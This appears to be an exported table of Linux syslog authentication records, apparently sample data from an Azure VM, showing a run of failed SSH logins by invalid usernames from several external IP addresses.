+9011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:15:52,UbuntuDevEnv,2019-06-25 22:15:52,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 212.156.136.114 port 38850 [preauth],42262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,212.156.136.1,38850,,
+9012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:16:26,UbuntuDevEnv,2019-06-25 22:16:25,auth,UbuntuDevEnv,info,Invalid user remi_ext from 138.68.186.24 port 58180,42644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,138.68.186.2,58180,,
+9013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:16:26,UbuntuDevEnv,2019-06-25 22:16:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:16:26,UbuntuDevEnv,2019-06-25 22:16:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.186.24,42644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.186.2,,0,
+9015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:16:28,UbuntuDevEnv,2019-06-25 22:16:27,auth,UbuntuDevEnv,info,Failed password for invalid user remi_ext from 138.68.186.24 port 58180 ssh2,42644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,138.68.186.2,58180,,
+9016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:16:28,UbuntuDevEnv,2019-06-25 22:16:27,auth,UbuntuDevEnv,info,Disconnected from invalid user remi_ext 138.68.186.24 port 58180 [preauth],42644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remi,138.68.186.2,58180,,
+9017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:16:28,UbuntuDevEnv,2019-06-25 22:16:27,auth,UbuntuDevEnv,info,"Received disconnect from 138.68.186.24 port 58180:11: Normal Shutdown, Thank you for playing [preauth]",42644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.186.2,58180,,
+9018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:06,UbuntuDevEnv,2019-06-25 22:17:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,42849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:06,UbuntuDevEnv,2019-06-25 22:17:06,auth,UbuntuDevEnv,info,Invalid user anu from 152.250.252.179 port 54662,42849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anu,152.250.252.1,54662,,
+9020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:06,UbuntuDevEnv,2019-06-25 22:17:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:08,UbuntuDevEnv,2019-06-25 22:17:08,auth,UbuntuDevEnv,info,Failed password for invalid user anu from 152.250.252.179 port 54662 ssh2,42849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anu,152.250.252.1,54662,,
+9022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:08,UbuntuDevEnv,2019-06-25 22:17:08,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 54662:11: Bye Bye [preauth],42849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,54662,,
+9023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:08,UbuntuDevEnv,2019-06-25 22:17:08,auth,UbuntuDevEnv,info,Disconnected from invalid user anu 152.250.252.179 port 54662 [preauth],42849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anu,152.250.252.1,54662,,
+9024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:20,UbuntuDevEnv,2019-06-25 22:17:19,auth,UbuntuDevEnv,info,Invalid user diamond from 165.22.96.224 port 60938,42980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diamond,165.22.96.2,60938,,
+9025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:20,UbuntuDevEnv,2019-06-25 22:17:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:20,UbuntuDevEnv,2019-06-25 22:17:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,42980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+9027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:20,UbuntuDevEnv,2019-06-25 22:17:20,auth,UbuntuDevEnv,info,Invalid user nagios from 212.156.136.114 port 59552,42984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,212.156.136.1,59552,,
+9028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:20,UbuntuDevEnv,2019-06-25 22:17:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:20,UbuntuDevEnv,2019-06-25 22:17:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,42984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:21,UbuntuDevEnv,2019-06-25 22:17:21,auth,UbuntuDevEnv,info,Failed password for invalid user diamond from 165.22.96.224 port 60938 ssh2,42980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diamond,165.22.96.2,60938,,
+9031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:22,UbuntuDevEnv,2019-06-25 22:17:21,auth,UbuntuDevEnv,info,Disconnected from invalid user diamond 165.22.96.224 port 60938 [preauth],42980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diamond,165.22.96.2,60938,,
+9032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:22,UbuntuDevEnv,2019-06-25 22:17:21,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 60938:11: Bye Bye [preauth],42980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,60938,,
+9033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:22,UbuntuDevEnv,2019-06-25 22:17:21,auth,UbuntuDevEnv,info,Failed password for invalid user nagios from 212.156.136.114 port 59552 ssh2,42984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,212.156.136.1,59552,,
+9034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:22,UbuntuDevEnv,2019-06-25 22:17:22,auth,UbuntuDevEnv,info,Disconnected from invalid user nagios 212.156.136.114 port 59552 [preauth],42984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nagios,212.156.136.1,59552,,
+9035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:17:22,UbuntuDevEnv,2019-06-25 22:17:22,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 59552:11: Bye Bye [preauth],42984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,59552,,
+9036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:07,UbuntuDevEnv,2019-06-25 22:18:07,auth,UbuntuDevEnv,info,Invalid user pulse from 178.62.54.79 port 47066,43151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,178.62.54.7,47066,,
+9037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:07,UbuntuDevEnv,2019-06-25 22:18:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,43151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:07,UbuntuDevEnv,2019-06-25 22:18:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:10,UbuntuDevEnv,2019-06-25 22:18:09,auth,UbuntuDevEnv,info,Failed password for invalid user pulse from 178.62.54.79 port 47066 ssh2,43151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,178.62.54.7,47066,,
+9040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:10,UbuntuDevEnv,2019-06-25 22:18:09,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 47066:11: Bye Bye [preauth],43151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,47066,,
+9041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:10,UbuntuDevEnv,2019-06-25 22:18:09,auth,UbuntuDevEnv,info,Disconnected from invalid user pulse 178.62.54.79 port 47066 [preauth],43151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pulse,178.62.54.7,47066,,
+9042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:47,UbuntuDevEnv,2019-06-25 22:18:47,auth,UbuntuDevEnv,info,Invalid user liao from 212.156.136.114 port 47231,43290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liao,212.156.136.1,47231,,
+9043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:47,UbuntuDevEnv,2019-06-25 22:18:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,43290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:47,UbuntuDevEnv,2019-06-25 22:18:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:49,UbuntuDevEnv,2019-06-25 22:18:49,auth,UbuntuDevEnv,info,Failed password for invalid user liao from 212.156.136.114 port 47231 ssh2,43290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liao,212.156.136.1,47231,,
+9046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:49,UbuntuDevEnv,2019-06-25 22:18:49,auth,UbuntuDevEnv,info,Received disconnect from 212.156.136.114 port 47231:11: Bye Bye [preauth],43290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,212.156.136.1,47231,,
+9047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:49,UbuntuDevEnv,2019-06-25 22:18:49,auth,UbuntuDevEnv,info,Disconnected from invalid user liao 212.156.136.114 port 47231 [preauth],43290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,liao,212.156.136.1,47231,,
+9048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:53,UbuntuDevEnv,2019-06-25 22:18:52,auth,UbuntuDevEnv,info,Invalid user roy from 152.250.252.179 port 43082,43306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,152.250.252.1,43082,,
+9049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:53,UbuntuDevEnv,2019-06-25 22:18:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,43306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:53,UbuntuDevEnv,2019-06-25 22:18:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:54,UbuntuDevEnv,2019-06-25 22:18:54,auth,UbuntuDevEnv,info,Failed password for invalid user roy from 152.250.252.179 port 43082 ssh2,43306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,152.250.252.1,43082,,
+9052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:55,UbuntuDevEnv,2019-06-25 22:18:54,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 43082:11: Bye Bye [preauth],43306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,43082,,
+9053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:55,UbuntuDevEnv,2019-06-25 22:18:54,auth,UbuntuDevEnv,info,Disconnected from invalid user roy 152.250.252.179 port 43082 [preauth],43306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,152.250.252.1,43082,,
+9054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:59,UbuntuDevEnv,2019-06-25 22:18:59,auth,UbuntuDevEnv,info,Invalid user user2 from 165.22.96.224 port 51558,43328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,165.22.96.2,51558,,
+9055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:59,UbuntuDevEnv,2019-06-25 22:18:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:18:59,UbuntuDevEnv,2019-06-25 22:18:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,43328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+9057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:01,UbuntuDevEnv,2019-06-25 22:19:01,auth,UbuntuDevEnv,info,Failed password for invalid user user2 from 165.22.96.224 port 51558 ssh2,43328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,165.22.96.2,51558,,
+9058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:01,UbuntuDevEnv,2019-06-25 22:19:01,auth,UbuntuDevEnv,info,Disconnected from invalid user user2 165.22.96.224 port 51558 [preauth],43328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,165.22.96.2,51558,,
+9059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:01,UbuntuDevEnv,2019-06-25 22:19:01,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 51558:11: Bye Bye [preauth],43328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,51558,,
+9060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:31,UbuntuDevEnv,2019-06-25 22:19:30,auth,UbuntuDevEnv,info,Invalid user chandru from 220.134.138.111 port 55500,43442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chandru,220.134.138.1,55500,,
+9061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:31,UbuntuDevEnv,2019-06-25 22:19:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,43442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+9062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:31,UbuntuDevEnv,2019-06-25 22:19:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:32,UbuntuDevEnv,2019-06-25 22:19:32,auth,UbuntuDevEnv,info,Failed password for invalid user chandru from 220.134.138.111 port 55500 ssh2,43442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chandru,220.134.138.1,55500,,
+9064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:33,UbuntuDevEnv,2019-06-25 22:19:32,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 55500:11: Bye Bye [preauth],43442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,55500,,
+9065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:19:33,UbuntuDevEnv,2019-06-25 22:19:32,auth,UbuntuDevEnv,info,Disconnected from invalid user chandru 220.134.138.111 port 55500 [preauth],43442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chandru,220.134.138.1,55500,,
+9066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:18,UbuntuDevEnv,2019-06-25 22:20:17,auth,UbuntuDevEnv,info,Invalid user video from 212.156.136.114 port 27714,43622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,video,212.156.136.1,27714,,
+9067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:18,UbuntuDevEnv,2019-06-25 22:20:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=212.156.136.114,43622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,212.156.136.1,,0,
+9068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:18,UbuntuDevEnv,2019-06-25 22:20:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,43622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:19,UbuntuDevEnv,2019-06-25 22:20:19,auth,UbuntuDevEnv,info,Failed password for invalid user video from 212.156.136.114 port 27714 ssh2,43622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,video,212.156.136.1,27714,,
+9070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:20:19,UbuntuDevEnv,2019-06-25 22:20:19,auth,UbuntuDevEnv,info,Disconnected from invalid user video 212.156.136.114 port 27714 [preauth],43622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,video,212.156.136.1,27714,,
